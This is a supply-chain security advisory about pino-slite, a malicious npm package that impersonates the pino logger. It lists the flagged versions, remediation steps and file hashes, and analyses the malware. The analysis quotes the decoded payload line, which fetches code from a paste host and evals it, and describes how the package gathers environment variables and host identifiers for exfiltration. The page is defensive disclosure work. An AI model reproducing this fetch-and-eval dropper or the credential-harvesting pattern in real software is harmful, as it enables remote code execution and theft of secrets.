Which versions of pino-slite are malicious?

The following npm versions of pino-slite are flagged malicious: 4.1.12, 4.1.16. Treat any of these as compromised.

How do I remediate pino-slite if I installed it?

Remove pino-slite from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is pino-slite part of a known attack campaign?

Yes — pino-slite is associated with the IN-MAL-2026-006944, IN-MAL-2026-006945 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect pino-slite in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking pino-slite and packages like it before any post-install script runs.

Malicious package

pino-slitenpm

Malicious code in pino-slite (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6078

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall pino-slite

What this malware does

pino-slite impersonates the legitimate pino logger (README titled 'pino-slite (Pino)' with badges and homepage pointing to getpino.io, exported function named pino). On require(), lib/writer.js (loaded transitively from the package main pino.js) decodes a base64 string and passes it to eval(atob(hash)). The decoded payload performs fetch('https://jsonkeeper.com/b/0DWFC').then(r=>r.json()).then(d=>{eval(d.ret);}), executing attacker-controlled JavaScript fetched from a mutable third-party paste host on every load. Immediately before the eval, the module assembles a data object containing {...process.env, version, platform: os.platform(), hostname: os.hostname(), username: os.userInfo().username, macAddresses: <non-internal IPv4 MACs>}, which is in scope for the remotely-fetched code — providing a ready-made channel to exfiltrate the installer's full environment (CI secrets, AWS_*, NPM_TOKEN, GH tokens, etc.) and host identifiers. This combines a typosquat lure, an import-time RCE dropper from an attacker-controlled mutable URL, and an environment-credential harvester.

Malicious versions

2 flagged

4.1.124.1.16

Indicators of compromise (SHA-256)

7ed71e73ac59b29f0867d2fbb15fc0391049b1ba4fe3c7b310bfbd1e84067c9e

ea546461f3101a972511a0bb9d66b73849904ad3522724d1670b003e108c11bb

Frequently asked questions

No. pino-slite on npm has been identified as a malicious package (versions 4.1.12, 4.1.16 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006944IN-MAL-2026-006945

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection